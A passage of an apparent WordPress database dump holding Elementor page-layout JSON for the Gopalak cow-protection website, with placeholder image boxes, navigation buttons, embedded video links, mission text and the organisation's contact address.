"id\":\"d837b3b\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"1536x1536\",\"thumbnail_custom_dimension\":{\"width\":\"1200\",\"height\":\"800\"},\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"text_align\":\"center\",\"title_bottom_space\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#3AB2A7\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"4b8356a\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"_margin\":{\"unit\":\"px\",\"top\":\"-21\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"4cb627c\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"background_background\":\"classic\"},\"elements\":[{\"id\":\"fafaf1c\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"1536x1536\",\"thumbnail_custom_dimension\":{\"width\":\"1200\",\"height\":\"800\"},\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"text_align\":\"center\",\"title_bottom_space\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#4EB4AC\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"0775f80\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"_margin\":{\"unit\":\"px\",\"top\":\"-21\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5913281\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"f899190\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"1536x1536\",\"thumbnail_custom_dimension\":{\"width\":\"1200\",\"height\":\"800\"},\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"text_align\":\"center\",\"title_bottom_space\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#2EB7BC\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"8a4dc1c\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"_margin\":{\"unit\":\"px\",\"top\":\"-21\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5270078\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"6ac0016\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"1536x1536\",\"thumbnail_custom_dimension\":{\"width\":\"1200\",\"height\":\"800\"},\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"text_align\":\"center\",\"title_bottom_space\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#2EB7BC\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"9200df5\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"_margin\":{\"unit\":\"px\",\"top\":\"-21\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7107c53\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"c67e6d7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e70fe37\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"11aef9e\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":904,\"sizes\":[]},\"structure\":\"22\"},\"elements\":[{\"id\":\"2d9f268\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"86a6968\",\"elType\":\"widget\",\"settings\":{\"title\":\"About Gopalak\",\"title_color\":\"#264D5D\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"aa78264\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br \\/>Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"67983f0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8e299f1\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#324735\",\"_margin\":{\"unit\":\"px\",\"top\":\"49\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"23d3073\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"7d36be0\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e43f473\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":71,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1c1c876\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\",\"background_background\":\"classic\",\"background_color\":\"#D8CDCD52\"},\"elements\":[{\"id\":\"4b90a4b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"dee4139\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=0wll4Km5AU8\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"97c7ffb\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f586793\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=bEyCT3KsAMQ\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"2f0ac23\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ec43a70\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=sVQg0-3WSc4\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ca8c599\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"f8ca017\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"da25a76\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"216af8d\",\"elType\":\"section\",\"settings\":{\"structure\":\"21\"},\"elements\":[{\"id\":\"882c92e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"772bd0e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Gallery\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fbf7c50\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2c59178\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"29d5b45\",\"elType\":\"widget\",\"settings\":{\"carousel\":[{\"id\":1340,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/banner1.jpg\"},{\"id\":1354,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\"},{\"id\":1339,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/cows-farming-on-green-meadow-260nw-1704884002-e1663753177624.webp\"},{\"id\":1355,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\"},{\"id\":1357,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\"}]},\"elements\":[],\"widgetType\":\"image-carousel\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f9dd695\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"0f89775\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"66d5270\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5d24ace\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/GOPALAK555.png\",\"id\":1579,\"alt\":\"\",\"source\":\"library\"},\"background_repeat\":\"no-repeat\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"00\",\"right\":\"100\",\"bottom\":\"80\",\"left\":\"100\",\"isLinked\":false},\"background_position\":\"initial\",\"background_ypos\":{\"unit\":\"px\",\"size\":-18,\"sizes\":[]}},\"elements\":[{\"id\":\"eb82b0e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"90\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"7af9c58\",\"elType\":\"widget\",\"settings\":{\"title\":\"Gopalak Values\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"73daaad\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Service to all, Total integrity, Absolute commitment to quality, Respect and devotion to Mother Nature. No compromise on being who we are.<\\/p>\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"6345fb6\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"background_color\":\"#FFAA00\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/about-us\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7410379\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#001B06\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"b43ead7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5282e6a\",\"elType\":\"widget\",\"settings\":{\"title\":\"Address\",\"header_size\":\"h4\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6d3c6b7\",\"elType\":\"widget\",\"settings\":{\"title\":\" 800\\nvivdhity ventures<br>Second floor,  HSR Layout<br>Bangalore 560102<br>\\nContact : (+91)7411722844<br>\\nE-mail id: pavitra@gopalak.in\",\"header_size\":\"span\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false}]'),(9322,1598,'_elementor_page_assets','a:0:{}'),(9324,1599,'_elementor_edit_mode','builder'),(9325,1599,'_elementor_template_type','wp-page'),(9326,1599,'_elementor_version','3.7.8'),(9327,1599,'_wp_page_template','elementor_canvas'),(9328,1599,'_elementor_data','[{\"id\":\"2bcecd0\",\"elType\":\"section\",\"settings\":{\"structure\":\"80\",\"background_background\":\"classic\",\"background_color\":\"#006505\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-47\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"08c3f0f\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"98c2def\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/Group-122.png\",\"id\":1543,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thaps-thumb-img\",\"image_custom_dimension\":{\"width\":\"150\",\"height\":\"150\"},\"link_to\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"3439158\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"f29b88a\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"049c5ad\",\"elType\":\"widget\",\"settings\":{\"text\":\"Home\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/home\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5af2fa6\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"59347f6\",\"elType\":\"widget\",\"settings\":{\"text\":\"shop\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"1609351\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"39fe47a\",\"elType\":\"widget\",\"settings\":{\"text\":\"Adobt\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/about-us\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"db735bc\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"27f86d0\",\"elType\":\"widget\",\"settings\":{\"text\":\"About us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/about-us\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b5a07d3\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"6a4419e\",\"elType\":\"widget\",\"settings\":{\"text\":\"Contact us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/home\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b366bab\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"4c45b22\",\"elType\":\"widget\",\"settings\":{\"text\":\"My Account\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/my-account\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1fbbc13\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/GOPALAK555.png\",\"id\":1579,\"alt\":\"\",\"source\":\"library\"},\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"77\",\"left\":\"0\",\"isLinked\":false},\"background_slideshow_gallery\":[{\"id\":1357,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\"},{\"id\":1355,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\"},{\"id\":1356,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/abstract-background-wheat-farm-wallpaper-51701325.jpg\"}],\"background_repeat\":\"no-repeat\"},\"elements\":[{\"id\":\"945df22\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"104\",\"isLinked\":false}},\"elements\":[{\"id\":\"5a1c0c9\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":true},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-17\",\"bottom\":\"0\",\"left\":\"-27\",\"isLinked\":false}},\"elements\":[{\"id\":\"3ed0437\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":47.722999999999999,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-1\",\"bottom\":\"0\",\"left\":\"-67\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"892627f\",\"elType\":\"widget\",\"settings\":{\"title\":\"Gopalak\",\"title_color\":\"#154833\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Roboto\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"600\",\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":3.1000000000000001,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"5c704bd\",\"elType\":\"widget\",\"settings\":{\"title\":\"Values\",\"align\":\"center\",\"title_color\":\"#154833\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Roboto\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"700\",\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":4.2000000000000002,\"sizes\":[]},\"typography_word_spacing\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fb27b52\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>In order to prevent the sinful act of killing cows or sending the cows to slaughter houses, as a small step towards protection of cows and to provide shelter for aged and unproductive cows.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"1795b3e\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/about-us\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"center\",\"background_color\":\"#154833\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"26b984b\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":52.229999999999997,\"background_background\":\"classic\",\"margin\":{\"unit\":\"px\",\"top\":\"187\",\"right\":\"0\",\"bottom\":\"-40\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"5\",\"isLinked\":false}},\"elements\":[],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d5b9324\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e372b45\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ce9e678\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"623a672\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":976,\"sizes\":[]},\"structure\":\"40\"},\"elements\":[{\"id\":\"739cf25\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"background_background\":\"classic\",\"border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[{\"id\":\"d837b3b\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"1536x1536\",\"thumbnail_custom_dimension\":{\"width\":\"1200\",\"height\":\"800\"},\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"text_align\":\"center\",\"title_bottom_space\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#3AB2A7\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"4b8356a\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"_margin\":{\"unit\":\"px\",\"top\":\"-21\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"4cb627c\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"background_background\":\"classic\"},\"elements\":[{\"id\":\"fafaf1c\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"1536x1536\",\"thumbnail_custom_dimension\":{\"width\":\"1200\",\"height\":\"800\"},\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"text_align\":\"center\",\"title_bottom_space\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#4EB4AC\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"0775f80\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"_margin\":{\"unit\":\"px\",\"top\":\"-21\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5913281\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"f899190\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"1536x1536\",\"thumbnail_custom_dimension\":{\"width\":\"1200\",\"height\":\"800\"},\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"text_align\":\"center\",\"title_bottom_space\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#2EB7BC\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"8a4dc1c\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"_margin\":{\"unit\":\"px\",\"top\":\"-21\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5270078\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"6ac0016\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"1536x1536\",\"thumbnail_custom_dimension\":{\"width\":\"1200\",\"height\":\"800\"},\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"text_align\":\"center\",\"title_bottom_space\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#2EB7BC\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"9200df5\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"_margin\":{\"unit\":\"px\",\"top\":\"-21\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7107c53\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"c67e6d7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e70fe37\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"11aef9e\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":904,\"sizes\":[]},\"structure\":\"22\"},\"elements\":[{\"id\":\"2d9f268\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"86a6968\",\"elType\":\"widget\",\"settings\":{\"title\":\"About Gopalak\",\"title_color\":\"#264D5D\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"aa78264\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br \\/>Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"67983f0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8e299f1\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click 